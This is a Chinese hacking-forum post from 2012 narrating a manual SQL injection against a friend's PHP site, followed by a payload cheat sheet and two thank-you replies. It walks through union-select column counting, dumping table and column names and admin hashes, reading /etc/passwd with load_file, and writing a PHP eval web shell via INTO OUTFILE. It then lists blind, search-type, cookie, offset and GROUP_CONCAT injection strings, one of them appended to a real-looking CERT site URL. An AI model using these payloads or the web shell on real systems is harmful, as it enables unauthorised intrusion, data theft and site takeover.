找回密码
 立即注册
查看: 4024|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~$ C$ g( r4 b, Y! `( P( V3 `
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?# U% @  ~2 @1 I. B: O/ p% R; g
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
* A0 c3 ?/ e" T" C( k4 _如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)! {* ]; V, B2 y: B' ?5 n. @
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
% X* k; f! K6 t: m这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
. D8 t! @% T; Q' v+ K' q# XWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
* B4 b0 Z  W6 C* Q/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入: @' |4 D; @/ x  F% s
                         4 A" O+ G6 u9 m/ f% J: `  f( F
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,1 `$ I0 B2 j; D3 ]! R  t* i
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意1 m4 J0 I4 }6 c+ `4 @  K
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息& j! i! w" {. {/ O$ T; X  Z
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。1 ]# r' f- h% S8 Y0 A
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,& [, D9 M; B$ m$ A
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
3 q7 z- f, _9 H8 w- r我就用的是第二个思路,
5 g/ y0 ^/ I1 g6 B+ i. Q# ]- J8 {3 d! W提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
3 h% t7 t- K; J3 B) ^6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,! @& y' C& `" J/ X$ N  D: H
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
) p& G9 D( g" `- n注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。) T) P% ~( J7 A  R  N  o
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????6 A' T" O5 P& n! K: h
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
, @: k# H; h2 e/ m  h4 m$ C% R提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --2 \4 c/ Q; x7 `5 `! q/ a4 n
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
4 C& `5 i. E; H调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......$ w4 X4 J( v! }# L' S* z3 W) c: J
下面是一些很普遍注入方式资料:& p3 ?+ ?8 z9 R2 G; ]1 D
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=', @3 T" l  e8 n( J2 v0 Z  _4 h
拆半法
, ]1 v. a5 _! |######################################/ F2 o, |9 _$ M6 o
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。8 r9 L( C/ j" L1 z& S0 D  {% H
and exists (select * from admin)* |0 h$ z' g( f  V6 n. V
and exists(select id from admin)
$ u  _3 r# T$ P8 @7 Mand exists(select id from admin where id=1)  m6 M) V0 w/ Q6 Z4 ]. R& l! s2 n3 R
and exists(select id from admin where id>1)
# y% _9 @/ @) k% G" A" Q% w' E然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
) s0 v! r" h, |! l" D! |) wand exists (select username from admin)8 E8 J3 O, P0 s8 b7 w
and exists (select password from admin)/ j+ _# g0 K# @/ o5 C2 _/ r
and exists (select id from admin where len(username)<10 and id=1)
% r; I# Q" `/ j, }: z7 b1 |# Iand exists (select id from admin where len(username)>5 and id=1)
- |* I. f' n9 {8 N8 Y/ b# W9 Z9 tand exists (select id from admin where len(username)=6 and id=1)
, {+ L3 A& F9 h9 C0 P% uand exists (select id from admin where len(password)<10 and id=1)" Y$ d) j4 i$ k. U  R
and exists (select id from admin where len(password)>5 and id=1)0 u& N3 P% |6 V
and exists (select id from admin where len(password)=7 and id=1)+ X3 u. O$ a# R4 ]+ J; ^0 x
and (select top 1 asc(mid(username,1,1)) from admin)=97
9 b) M6 S7 q9 R! Z4 L6 o' Q返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
* t& `, @& {4 L猜第二位把username,1,1改成username,2,1就可以了。! U4 _$ g) o) a" s: K9 C; f. C
猜密码把username改成password就OK了4 N3 a2 u7 q5 @
##################################################
: i5 s" O+ k# e" f/ Y搜索型注入
3 [% L2 F6 A4 [5 v$ ?; G##################################
4 a1 v- a& R' I0 X% g- t%' and 1=1 and '%'='
+ k: D) r7 V7 d# L+ v, L2 h) |/ d%' and exists (select * from admin) and '%'='2 t. T, l% [* r8 J) C
%' and exists(select id from admin where id=1) and '%'=', V0 C5 p! j$ V: I; S& }0 I% R: Z
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
% N( B3 P: L/ I& J, v( y%' and exists (select id from admin where len(password)=7 and id=1) and '%'='4 t* J- a/ [" C* w7 X# Z
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
7 t1 a/ o! N$ b! m* Z这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='1 V8 e- k1 W3 Q8 C
对于MSSQL数据库,后面可以吧 and '%'='换成--6 K; H3 }( N' ^4 Q1 M
还有一点搜索型注入也可以使用union语句。- j& f/ d3 R: G, V# ~6 E$ i
########################################################& Z4 q8 H% P- e! K: }
联合查询。
/ ]8 k% P* J5 M: ~# |% X# W#####################################- m7 _* t/ J/ u* T* @: I- f
order by 103 j6 d& d5 V! ]% `
and 1=2 union select 1,2,3,4,5,6,7,8,9,103 ~! v/ }& m5 L9 @$ a& W/ E
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin2 {- g/ B- a  A
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=14 l% D, b% o1 ^, r# d6 K+ ]. a. _+ P8 Q: S
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
$ M! Q4 A/ J+ K# }###################################
' Q* ^% d: C# |  h2 Scookie注入
2 j4 I) I; V( K) B###############################
0 p. {+ J* M# [  Q% _, `" nhttp://www.******.com/shownews.asp?id=1276 Y  ?5 g2 v4 t* R6 B
http://www.******.com/shownews.asp8 T( W* K/ r1 Q! `/ u: ?
alert(="id="+escape("127"));
3 A0 ]( z: X2 z- |alert(="id="+escape("127 and 1=1"));
( K1 y) T2 Z( T4 W7 {3 z+ }  s# Zalert(="id="+escape("127 order by 10"));! U5 ?1 M" ~+ q) D
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
% S3 V5 Q6 V1 x4 }0 g. x7 o9 ~alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
+ n4 x% b' `6 `这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
& a( W7 U% s0 ^9 Y3 D5 n###################################! [$ c; P9 G+ w  M
偏移注入
+ Q/ x! D; Z6 I  [7 u###########################################################  ~" `0 [0 _7 d- T$ n/ u
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
; n: l% p6 E% Y' d6 Lunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
- i$ \8 P* M" y6 E# Munion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
2 d( b9 p# K( v. T8 L9 a; {9 Cunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id): }8 {: r& ~, L8 v5 i7 ?3 |$ B
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)+ A5 m$ e% `" d1 l& p
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)0 t$ n% G7 P) u) d: ]
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on! i7 e4 D) t5 e# |1 m7 M
a.id=d.id)
# g; p) c& Y* e7 {  K$ {0 ]and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)& T* J/ E' u% f- E  l
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
/ f- |! q1 b+ S/ a1 `2 Q, y  
1 Y" P2 k0 D' q, k============================================================================================================6 a& Q+ t1 o3 K
1.判断版本- `" s$ A. R1 L
and ord(mid(version(),1,1))>51% x: \% y: {3 l- \# i7 f; r
返回正常,说明大于4.0版本,支持ounion查询# q2 R% W4 b- R/ K9 X4 g8 V
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
7 v2 v+ ^0 S+ \7 b) C: Oand 2=4 union select 1,2,3,4,5,6,7,8,9--3 ]6 h8 }/ {9 h  ~& c" ?
3.查看数据库版本及当前用户,- i1 g# O' ~: U  R. I' e3 t, m, B5 k
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
8 f9 z( f; p' l8 F; l+ g. H数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
  O* G) _+ z- P; _+ Q7 L4.判断有没有写权限5 k" G6 c2 u/ W$ @  c
and (select count(*) from MySQL.user)>0--
: ~1 f/ M0 z; C0 J- ^5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,19 h0 N8 B4 d$ e# Y. A: L% L( J
用不了这个命令,就学习土耳其黑客手法,如下* F( `) U) G, I' W+ p7 c# k
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
* F) e( Y9 H, H5 e5 Y6.爆表,爆库
) B+ `, p% j3 C, K9 R% ^and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
, e, V( @0 \& T6 j, }7.爆列名,爆表
' n2 D( `* Z0 pand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--, K8 I8 |9 ~  t; Q" S
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
9 y0 X& |" J* i. `; t+ i" \and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--/ M5 |& J  ?7 g; U# C7 F
9.爆字段内容, G/ }3 E) y/ D- S- e
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
# z. \( O" y$ F+ n0 \+ _0 uhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表